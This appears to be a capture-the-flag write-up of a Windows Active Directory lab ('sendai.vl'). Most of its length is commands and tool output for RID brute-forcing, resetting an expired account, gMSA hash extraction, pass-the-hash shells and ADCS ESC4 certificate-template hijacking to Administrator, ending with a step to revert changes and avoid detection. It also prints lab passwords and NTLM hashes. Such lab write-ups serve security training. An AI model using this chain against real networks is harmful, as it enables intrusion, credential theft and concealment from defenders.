We hope this message finds you well. We would like to inform you about an important security update regarding user account passwords. Recently, we conducted a thorough penetration test, which revealed that a significant number of user accounts have weak and insecure passwords.

To address this concern and maintain the highest level of security within our organization, the IT department has taken immediate action. All user accounts with insecure passwords have been expired as a precautionary measure. This means that affected users will be required to change their passwords upon their next login.

We kindly request all impacted users to follow the password reset process promptly to ensure the security and integrity of our systems. Please bear in mind that strong passwords play a crucial role in safeguarding sensitive information and protecting our network from potential threats.

If you need assistance or have any questions regarding the password reset procedure, please don&apos;t hesitate to reach out to the IT support team. They will be more than happy to guide you through the process and provide any necessary support.

Thank you for your cooperation and commitment to maintaining a secure environment for all of us. Your vigilance and adherence to robust security practices contribute significantly to our collective safety.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This document was gold - it revealed that accounts with weak passwords had been expired, meaning users would need to reset their passwords. This suggested there might be accounts with empty passwords or in a password-must-change state.&lt;/p&gt;
&lt;h2&gt;Domain User Enumeration&lt;/h2&gt;
&lt;p&gt;I proceeded to enumerate all domain users using RID brute forcing to identify potential targets:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ nxc smb 10.129.220.222 -u &quot;Guest&quot; -p &quot;&quot; --rid-brute
SMB         10.129.220.222  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB         10.129.220.222  445    DC               [+] sendai.vl\Guest:
SMB         10.129.220.222  445    DC               498: SENDAI\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.220.222  445    DC               500: SENDAI\Administrator (SidTypeUser)
SMB         10.129.220.222  445    DC               501: SENDAI\Guest (SidTypeUser)
SMB         10.129.220.222  445    DC               502: SENDAI\krbtgt (SidTypeUser)
SMB         10.129.220.222  445    DC               512: SENDAI\Domain Admins (SidTypeGroup)
SMB         10.129.220.222  445    DC               513: SENDAI\Domain Users (SidTypeGroup)
SMB         10.129.220.222  445    DC               514: SENDAI\Domain Guests (SidTypeGroup)
SMB         10.129.220.222  445    DC               515: SENDAI\Domain Computers (SidTypeGroup)
SMB         10.129.220.222  445    DC               516: SENDAI\Domain Controllers (SidTypeGroup)
SMB         10.129.220.222  445    DC               517: SENDAI\Cert Publishers (SidTypeAlias)
SMB         10.129.220.222  445    DC               518: SENDAI\Schema Admins (SidTypeGroup)
SMB         10.129.220.222  445    DC               519: SENDAI\Enterprise Admins (SidTypeGroup)
SMB         10.129.220.222  445    DC               520: SENDAI\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.220.222  445    DC               521: SENDAI\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.220.222  445    DC               522: SENDAI\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.220.222  445    DC               525: SENDAI\Protected Users (SidTypeGroup)
SMB         10.129.220.222  445    DC               526: SENDAI\Key Admins (SidTypeGroup)
SMB         10.129.220.222  445    DC               527: SENDAI\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.220.222  445    DC               553: SENDAI\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.220.222  445    DC               571: SENDAI\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.220.222  445    DC               572: SENDAI\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.220.222  445    DC               1000: SENDAI\DC$ (SidTypeUser)
SMB         10.129.220.222  445    DC               1101: SENDAI\DnsAdmins (SidTypeAlias)
SMB         10.129.220.222  445    DC               1102: SENDAI\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.220.222  445    DC               1103: SENDAI\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)
SMB         10.129.220.222  445    DC               1104: SENDAI\sqlsvc (SidTypeUser)
SMB         10.129.220.222  445    DC               1105: SENDAI\websvc (SidTypeUser)
SMB         10.129.220.222  445    DC               1107: SENDAI\staff (SidTypeGroup)
SMB         10.129.220.222  445    DC               1108: SENDAI\Dorothy.Jones (SidTypeUser)
SMB         10.129.220.222  445    DC               1109: SENDAI\Kerry.Robinson (SidTypeUser)
SMB         10.129.220.222  445    DC               1110: SENDAI\Naomi.Gardner (SidTypeUser)
SMB         10.129.220.222  445    DC               1111: SENDAI\Anthony.Smith (SidTypeUser)
SMB         10.129.220.222  445    DC               1112: SENDAI\Susan.Harper (SidTypeUser)
SMB         10.129.220.222  445    DC               1113: SENDAI\Stephen.Simpson (SidTypeUser)
SMB         10.129.220.222  445    DC               1114: SENDAI\Marie.Gallagher (SidTypeUser)
SMB         10.129.220.222  445    DC               1115: SENDAI\Kathleen.Kelly (SidTypeUser)
SMB         10.129.220.222  445    DC               1116: SENDAI\Norman.Baxter (SidTypeUser)
SMB         10.129.220.222  445    DC               1117: SENDAI\Jason.Brady (SidTypeUser)
SMB         10.129.220.222  445    DC               1118: SENDAI\Elliot.Yates (SidTypeUser)
SMB         10.129.220.222  445    DC               1119: SENDAI\Malcolm.Smith (SidTypeUser)
SMB         10.129.220.222  445    DC               1120: SENDAI\Lisa.Williams (SidTypeUser)
SMB         10.129.220.222  445    DC               1121: SENDAI\Ross.Sullivan (SidTypeUser)
SMB         10.129.220.222  445    DC               1122: SENDAI\Clifford.Davey (SidTypeUser)
SMB         10.129.220.222  445    DC               1123: SENDAI\Declan.Jenkins (SidTypeUser)
SMB         10.129.220.222  445    DC               1124: SENDAI\Lawrence.Grant (SidTypeUser)
SMB         10.129.220.222  445    DC               1125: SENDAI\Leslie.Johnson (SidTypeUser)
SMB         10.129.220.222  445    DC               1126: SENDAI\Megan.Edwards (SidTypeUser)
SMB         10.129.220.222  445    DC               1127: SENDAI\Thomas.Powell (SidTypeUser)
SMB         10.129.220.222  445    DC               1128: SENDAI\ca-operators (SidTypeGroup)
SMB         10.129.220.222  445    DC               1129: SENDAI\admsvc (SidTypeGroup)
SMB         10.129.220.222  445    DC               1130: SENDAI\mgtsvc$ (SidTypeUser)
SMB         10.129.220.222  445    DC               1131: SENDAI\support (SidTypeGroup)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I extracted all the usernames into a file for password testing:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ cat tmp_users.txt | grep SidTypeUser | awk &apos;{print $6}&apos; | awk -F\\ &apos;{print $2}&apos; &amp;gt; users.txt
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Testing for Weak Password Policies&lt;/h2&gt;
&lt;p&gt;Based on the incident report mentioning weak passwords, I tested if any users had blank passwords or were in a password-must-change state:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ nxc smb sendai.vl -u users.txt -p &quot;&quot; --continue-on-success
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;images/image-1.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;p&gt;I discovered two accounts with &quot;STATUS_PASSWORD_MUST_CHANGE&quot; - exactly what the incident report had hinted at. These accounts (Elliot.Yates and Thomas.Powell) had expired passwords and needed to be reset.&lt;/p&gt;
&lt;h2&gt;Password Reset and Initial Access&lt;/h2&gt;
&lt;p&gt;To take advantage of this, I used NetExec&apos;s password change module to set a new password for Elliot.Yates, thereby obtaining valid domain credentials:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ nxc smb sendai.vl -u &quot;Elliot.Yates&quot; -p &quot;&quot; -M change-password -o NEWPASS=Password@123
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;images/image-2.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;p&gt;With the password successfully changed, I now had working credentials for a domain user account.&lt;/p&gt;
&lt;h2&gt;Active Directory Analysis with BloodHound&lt;/h2&gt;
&lt;p&gt;With valid credentials in hand, I collected comprehensive Active Directory data for analysis using BloodHound:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ bloodhound-python -d sendai.vl -u &quot;Elliot.Yates&quot; -p &quot;Password@123&quot; -ns 10.129.125.63 -dc DC.sendai.vl -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: sendai.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: DC.sendai.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC.sendai.vl
INFO: Found 27 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 5 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.sendai.vl
INFO: Done in 00M 11S
INFO: Compressing output into 20250914234327_bloodhound.zip
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;After ingesting the BloodHound data, I discovered that both Elliot.Yates and Thomas.Powell were members of the &quot;support&quot; group, which had GenericAll privileges on the &quot;ADMSVC&quot; group:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/image-3.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;p&gt;This GenericAll privilege meant I could add members to the ADMSVC group, I noticed that ADMSVC group can read gmsa password of MGTSVC$, so this might be the correct path&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/image-4.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;h2&gt;Exploiting Group Membership Control&lt;/h2&gt;
&lt;p&gt;To escalate privileges, I leveraged the GenericAll permission to add Elliot.Yates to the ADMSVC group:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ bloodyAD -u &quot;Elliot.Yates&quot; -p &quot;Password@123&quot; -d sendai.vl --host dc.sendai.vl  add groupMember &quot;ADMSVC&quot; &quot;ELLIOT.YATES&quot;
[+] ELLIOT.YATES added to ADMSVC
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;With ADMSVC membership established, I could now access the gMSA password for the MGTSVC$ service account:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ nxc ldap sendai.vl -u &quot;Elliot.Yates&quot; -p &quot;Password@123&quot; --gmsa
LDAP        10.129.140.152  389    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:sendai.vl) (signing:None) (channel binding:Never)
LDAP        10.129.140.152  389    DC               [+] sendai.vl\Elliot.Yates:Password@123
LDAP        10.129.140.152  389    DC               [*] Getting GMSA Passwords
LDAP        10.129.140.152  389    DC               Account: mgtsvc$              NTLM: 9ed35c68b88f35007aa32c14c1332ce7     PrincipalsAllowedToReadPassword: admsvc

&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Using the extracted NTLM hash, I authenticated to the domain controller as the MGTSVC$ service account:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ evil-winrm -i sendai.vl -u &quot;mgtsvc$&quot; -H &quot;9ed35c68b88f35007aa32c14c1332ce7&quot;

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc&apos; for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;h1&gt;Post-Exploit Enumeration and Privilege Escalation&lt;/h1&gt;
&lt;p&gt;With access as the service account, I began exploring the system for additional credentials or attack vectors. A review of the C:\ directory revealed a configuration folder that contained database credentials:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;*Evil-WinRM* PS C:\&amp;gt; ls


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         7/11/2023   5:56 AM                config
d-----         4/15/2025   8:20 PM                inetpub
d-----          5/8/2021   1:20 AM                PerfLogs
d-r---         4/15/2025   7:51 PM                Program Files
d-----         7/18/2023   6:11 AM                Program Files (x86)
d-----         7/18/2023  10:31 AM                sendai
d-----         7/11/2023   2:35 AM                SQL2019
d-r---         9/17/2025   1:58 AM                Users
d-----         8/18/2025   5:04 AM                Windows
-a----         4/15/2025   8:27 PM             32 user.txt
*Evil-WinRM* PS C:\&amp;gt; cd config
*Evil-WinRM* PS C:\config&amp;gt; cat .sqlconfig
Server=dc.sendai.vl,1433;Database=prod;User Id=sqlsvc;Password=SurenessBlob85;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The SQL configuration file revealed credentials for the sqlsvc account. After testing various privilege escalation vectors with these credentials without success, I shifted focus to enumerating running services for additional attack surfaces.&lt;/p&gt;
&lt;h2&gt;Process and Service Enumeration&lt;/h2&gt;
&lt;p&gt;looking at the processes I found a weird process named helpdesk&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/image-7.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;p&gt;I examined the Windows registry for service configurations containing the name helpdesk:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;*Evil-WinRM* PS C:\Users\mgtsvc$\documents&amp;gt; dir -Path HKLM:\SYSTEM\CurrentControlSet\services | Get-ItemProperty | Select-Object ImagePath | select-string &quot;helpdesk&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This enumeration revealed another set of credentials embedded in a service configuration for the user Clifford.Davey:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/image-8.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;h2&gt;Analyzing Certificate Authority Permissions&lt;/h2&gt;
&lt;p&gt;Referring back to the BloodHound data, I confirmed that Clifford.Davey was a member of the CA-OPERATORS group, which suggested potential access to certificate authority operations:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/image-6.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;h2&gt;Certificate Template Vulnerability Assessment&lt;/h2&gt;
&lt;p&gt;With Clifford.Davey&apos;s credentials, I performed a comprehensive enumeration of the Active Directory Certificate Services to identify potential vulnerabilities:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ certipy-ad find -u &quot;clifford.davey&quot; -p &quot;RFmoB2WplgE_3p&quot;  -dc-ip 10.129.140.152 -dc-host dc.sendai.vl  -ns 10.129.140.152 -enabled -stdout -vulnerable
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 16 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for &apos;sendai-DC-CA&apos; via RRP
[*] Successfully retrieved CA configuration for &apos;sendai-DC-CA&apos;
[*] Checking web enrollment for CA &apos;sendai-DC-CA&apos; @ &apos;dc.sendai.vl&apos;
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : sendai-DC-CA
    DNS Name                            : dc.sendai.vl
    Certificate Subject                 : CN=sendai-DC-CA, DC=sendai, DC=vl
    Certificate Serial Number           : 326E51327366FC954831ECD5C04423BE
    Certificate Validity Start          : 2023-07-11 09:19:29+00:00
    Certificate Validity End            : 2123-07-11 09:29:29+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : SENDAI.VL\Administrators
      Access Rights
        ManageCa                        : SENDAI.VL\Administrators
                                          SENDAI.VL\Domain Admins
                                          SENDAI.VL\Enterprise Admins
        ManageCertificates              : SENDAI.VL\Administrators
                                          SENDAI.VL\Domain Admins
                                          SENDAI.VL\Enterprise Admins
        Enroll                          : SENDAI.VL\Authenticated Users
Certificate Templates
  0
    Template Name                       : SendaiComputer
    Display Name                        : SendaiComputer
    Certificate Authorities             : sendai-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireDns
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Server Authentication
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 100 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Template Created                    : 2023-07-11T12:46:12+00:00
    Template Last Modified              : 2023-07-11T12:46:19+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SENDAI.VL\Domain Admins
                                          SENDAI.VL\Domain Computers
                                          SENDAI.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : SENDAI.VL\Administrator
        Full Control Principals         : SENDAI.VL\Domain Admins
                                          SENDAI.VL\Enterprise Admins
                                          SENDAI.VL\ca-operators
        Write Owner Principals          : SENDAI.VL\Domain Admins
                                          SENDAI.VL\Enterprise Admins
                                          SENDAI.VL\ca-operators
        Write Dacl Principals           : SENDAI.VL\Domain Admins
                                          SENDAI.VL\Enterprise Admins
                                          SENDAI.VL\ca-operators
        Write Property Enroll           : SENDAI.VL\Domain Admins
                                          SENDAI.VL\Domain Computers
                                          SENDAI.VL\Enterprise Admins
    [+] User Enrollable Principals      : SENDAI.VL\Domain Computers
                                          SENDAI.VL\ca-operators
    [+] User ACL Principals             : SENDAI.VL\ca-operators
    [!] Vulnerabilities
      ESC4                              : User has dangerous permissions.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The enumeration revealed a critical ESC4 vulnerability in the SendaiComputer certificate template. As documented in the &lt;a href=&quot;https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc4-template-hijacking&quot;&gt;Certipy documentation&lt;/a&gt;, ESC4 (Template Hijacking) occurs when an attacker gains write permissions on a certificate template. This vulnerability allows modification of the template to create a vulnerable configuration, request a certificate using the malicious template, and potentially revert changes to cover tracks.&lt;/p&gt;
&lt;h2&gt;Template Hijacking Attack&lt;/h2&gt;
&lt;p&gt;To exploit this vulnerability, I first saved the current template configuration and then modified it to create a vulnerable state:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ certipy-ad -debug template -u &quot;clifford.davey@sendai.vl&quot; -p &quot;RFmoB2WplgE_3p&quot; -template SendaiComputer  -dc-ip 10.129.140.152 -dc-host dc.sendai.vl  -target dc.sendai.vl  -write-default-configuration
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[+] Nameserver: &apos;10.129.140.152&apos;
[+] DC IP: &apos;10.129.140.152&apos;
[+] DC Host: &apos;dc.sendai.vl&apos;
[+] Target IP: &apos;10.129.140.152&apos;
[+] Remote Name: &apos;dc.sendai.vl&apos;
[+] Domain: &apos;SENDAI.VL&apos;
[+] Username: &apos;CLIFFORD.DAVEY&apos;
[+] Authenticating to LDAP server using NTLM authentication
[+] Using NTLM signing: False (LDAP signing: True, SSL: True)
[+] Using channel binding signing: True (LDAP channel binding: True, SSL: True)
[+] Using LDAP channel binding for NTLM authentication
[+] LDAP NTLM authentication successful
[+] Bound to ldaps://10.129.140.152:636 - ssl
[+] Default path: DC=sendai,DC=vl
[+] Configuration path: CN=Configuration,DC=sendai,DC=vl
[*] Saving current configuration to &apos;SendaiComputer.json&apos;
[+] Attempting to write data to &apos;SendaiComputer.json&apos;
[+] Data written to &apos;SendaiComputer.json&apos;
[*] Wrote current configuration for &apos;SendaiComputer&apos; to &apos;SendaiComputer.json&apos;
[*] Updating certificate template &apos;SendaiComputer&apos;
[*] Replacing:
[*]     nTSecurityDescriptor: b&apos;\x01\x00\x04\x9c0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x02\x00\x1c\x00\x01\x00\x00\x00\x00\x00\x14\x00\xff\x01\x0f\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00&apos;
[*]     flags: 66104
[*]     pKIDefaultKeySpec: 2
[*]     pKIKeyUsage: b&apos;\x86\x00&apos;
[*]     pKIMaxIssuingDepth: -1
[*]     pKICriticalExtensions: [&apos;2.5.29.19&apos;, &apos;2.5.29.15&apos;]
[*]     pKIExpirationPeriod: b&apos;\x00@9\x87.\xe1\xfe\xff&apos;
[*]     pKIExtendedKeyUsage: [&apos;1.3.6.1.5.5.7.3.2&apos;]
[*]     pKIDefaultCSPs: [&apos;2,Microsoft Base Cryptographic Provider v1.0&apos;, &apos;1,Microsoft Enhanced Cryptographic Provider v1.0&apos;]
[*]     msPKI-Enrollment-Flag: 0
[*]     msPKI-Private-Key-Flag: 16
[*]     msPKI-Certificate-Name-Flag: 1
[*]     msPKI-Minimal-Key-Size: 2048
[*]     msPKI-Certificate-Application-Policy: [&apos;1.3.6.1.5.5.7.3.2&apos;]
Are you sure you want to apply these changes to &apos;SendaiComputer&apos;? (y/N): y
[*] Successfully updated &apos;SendaiComputer&apos;
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Verifying Template Modification&lt;/h2&gt;
&lt;p&gt;After the modification, I confirmed that the certificate template now exhibited the characteristics of an ESC1 vulnerability (Enrollee Supplies Subject and allows client authentication):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ certipy-ad find -u &quot;clifford.davey&quot; -p &quot;RFmoB2WplgE_3p&quot;  -dc-ip 10.129.140.152 -dc-host dc.sendai.vl  -ns 10.129.140.152 -enabled -stdout -vulnerable
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 16 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for &apos;sendai-DC-CA&apos; via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for &apos;sendai-DC-CA&apos;
[*] Checking web enrollment for CA &apos;sendai-DC-CA&apos; @ &apos;dc.sendai.vl&apos;
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : sendai-DC-CA
    DNS Name                            : dc.sendai.vl
    Certificate Subject                 : CN=sendai-DC-CA, DC=sendai, DC=vl
    Certificate Serial Number           : 326E51327366FC954831ECD5C04423BE
    Certificate Validity Start          : 2023-07-11 09:19:29+00:00
    Certificate Validity End            : 2123-07-11 09:29:29+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : SENDAI.VL\Administrators
      Access Rights
        ManageCa                        : SENDAI.VL\Administrators
                                          SENDAI.VL\Domain Admins
                                          SENDAI.VL\Enterprise Admins
        ManageCertificates              : SENDAI.VL\Administrators
                                          SENDAI.VL\Domain Admins
                                          SENDAI.VL\Enterprise Admins
        Enroll                          : SENDAI.VL\Authenticated Users
Certificate Templates
  0
    Template Name                       : SendaiComputer
    Display Name                        : SendaiComputer
    Certificate Authorities             : sendai-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2023-07-11T12:46:12+00:00
    Template Last Modified              : 2025-09-17T21:51:59+00:00
    Permissions
      Object Control Permissions
        Owner                           : SENDAI.VL\Administrator
        Full Control Principals         : SENDAI.VL\Authenticated Users
        Write Owner Principals          : SENDAI.VL\Authenticated Users
        Write Dacl Principals           : SENDAI.VL\Authenticated Users
    [+] User Enrollable Principals      : SENDAI.VL\Authenticated Users
    [+] User ACL Principals             : SENDAI.VL\Authenticated Users
    [!] Vulnerabilities
      ESC1                              : Enrollee supplies subject and template allows client authentication.
      ESC4                              : User has dangerous permissions.

&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The template was now vulnerable to both ESC1 and ESC4 attacks, with the critical &quot;Enrollee Supplies Subject&quot; property enabled and permissions allowing authenticated users to enroll.&lt;/p&gt;
&lt;h2&gt;Administrator Certificate Request&lt;/h2&gt;
&lt;p&gt;With the template in a vulnerable state, I requested a certificate for the Administrator account by specifying both the UPN and SID:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ certipy-ad -debug req -u &quot;clifford.davey@sendai.vl&quot; -p &quot;RFmoB2WplgE_3p&quot; -ca sendai-DC-CA -template SendaiComputer -target dc.sendai.vl -upn &quot;administrator@sendai.vl&quot; -sid &quot;S-1-5-21-3085872742-570972823-736764132-500&quot; -dc-ip 10.129.140.152 -dc-host dc.sendai.vl
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[+] Nameserver: &apos;10.129.140.152&apos;
[+] DC IP: &apos;10.129.140.152&apos;
[+] DC Host: &apos;dc.sendai.vl&apos;
[+] Target IP: None
[+] Remote Name: &apos;dc.sendai.vl&apos;
[+] Domain: &apos;SENDAI.VL&apos;
[+] Username: &apos;CLIFFORD.DAVEY&apos;
[+] Trying to resolve &apos;dc.sendai.vl&apos; at &apos;10.129.140.152&apos;
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.129.140.152[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.129.140.152[\pipe\cert]
[*] Request ID is 8
[*] Successfully requested certificate
[*] Got certificate with UPN &apos;administrator@sendai.vl&apos;
[+] Found SID in SAN URL: &apos;S-1-5-21-3085872742-570972823-736764132-500&apos;
[+] Found SID in security extension: &apos;S-1-5-21-3085872742-570972823-736764132-500&apos;
[*] Certificate object SID is &apos;S-1-5-21-3085872742-570972823-736764132-500&apos;
[*] Saving certificate and private key to &apos;administrator.pfx&apos;
[+] Attempting to write data to &apos;administrator.pfx&apos;
[+] Data written to &apos;administrator.pfx&apos;
[*] Wrote certificate and private key to &apos;administrator.pfx&apos;
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Extracting Administrator Credentials&lt;/h2&gt;
&lt;p&gt;Using the issued certificate, I extracted the Administrator&apos;s NTLM hash through PKINIT authentication:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.140.152
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: &apos;administrator@sendai.vl&apos;
[*]     SAN URL SID: &apos;S-1-5-21-3085872742-570972823-736764132-500&apos;
[*]     Security Extension SID: &apos;S-1-5-21-3085872742-570972823-736764132-500&apos;
[*] Using principal: &apos;administrator@sendai.vl&apos;
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to &apos;administrator.ccache&apos;
[*] Wrote credential cache to &apos;administrator.ccache&apos;
[*] Trying to retrieve NT hash for &apos;administrator&apos;
[*] Got hash for &apos;administrator@sendai.vl&apos;: aad3b435b51404eeaad3b435b51404ee:cfb106feec8b89a3d98e14dcbe8d087a
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Achieving Domain Administrator Access&lt;/h2&gt;
&lt;p&gt;With the Administrator&apos;s NTLM hash in hand, I established a privileged session on the domain controller:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ evil-winrm -i sendai.vl -u &quot;administrator&quot; -H cfb106feec8b89a3d98e14dcbe8d087a

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc&apos; for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Covering Tracks&lt;/h2&gt;
&lt;p&gt;To maintain operational security and avoid detection, I reverted the certificate template to its original configuration using the previously saved settings:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ certipy-ad -debug template -u &quot;clifford.davey@sendai.vl&quot; -p &quot;RFmoB2WplgE_3p&quot; -template SendaiComputer  -dc-ip 10.129.140.152 -dc-host dc.sendai.vl  -target dc.sendai.vl  -write-configuration SendaiComputer.json
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[+] Nameserver: &apos;10.129.140.152&apos;
[+] DC IP: &apos;10.129.140.152&apos;
[+] DC Host: &apos;dc.sendai.vl&apos;
[+] Target IP: &apos;10.129.140.152&apos;
[+] Remote Name: &apos;dc.sendai.vl&apos;
[+] Domain: &apos;SENDAI.VL&apos;
[+] Username: &apos;CLIFFORD.DAVEY&apos;
[+] Authenticating to LDAP server using NTLM authentication
[+] Using NTLM signing: False (LDAP signing: True, SSL: True)
[+] Using channel binding signing: True (LDAP channel binding: True, SSL: True)
[+] Using LDAP channel binding for NTLM authentication
[+] LDAP NTLM authentication successful
[+] Bound to ldaps://10.129.140.152:636 - ssl
[+] Default path: DC=sendai,DC=vl
[+] Configuration path: CN=Configuration,DC=sendai,DC=vl
[*] Saving current configuration to &apos;SendaiComputer.json&apos;
[+] Attempting to write data to &apos;SendaiComputer.json&apos;
File &apos;SendaiComputer.json&apos; already exists. Overwrite? (y/n - saying no will save with a unique filename): n
[+] Using alternative filename: &apos;SendaiComputer_9506a2c6-6d67-4177-8b68-50f3bedf034c.json&apos;
[+] Data written to &apos;SendaiComputer_9506a2c6-6d67-4177-8b68-50f3bedf034c.json&apos;
